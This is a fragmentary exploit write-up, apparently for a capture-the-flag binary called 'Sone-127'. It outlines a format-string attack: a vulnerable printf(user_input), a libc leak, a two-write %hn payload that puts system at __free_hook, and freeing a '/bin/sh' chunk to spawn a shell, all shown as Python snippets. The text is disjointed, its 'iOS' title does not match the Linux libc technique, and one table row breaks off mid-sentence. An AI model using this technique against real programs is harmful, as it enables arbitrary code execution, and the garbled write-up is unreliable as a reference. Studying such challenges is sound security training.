Sone-127 2021 «iOS INSTANT»
```python
# 1️⃣ Leak libc
libc_base = leak_libc(io)
```
```c
printf(user_input);
```

Using `objdump -d sone127d | grep -i printf`:
| Function | Purpose |
|----------|---------|
| `leak_libc` | Uses the format‑string to leak a libc address and compute the base. |
| `write_free_hook` | Crafts a two‑write `%hn` payload that stores `system` at `__free_hook`. |
| `get_shell` | Uploads a chunk containing `/bin/sh` and then frees it, invoking `system`. |
| `main` | Orchestrates the steps and drops |
```python
io.sendlineafter(b'> ', b'echo ' + payload)
io.recvuntil(b'> ')  # sync back to prompt
```
```python
# 3️⃣ Get a shell
get_shell(io)
```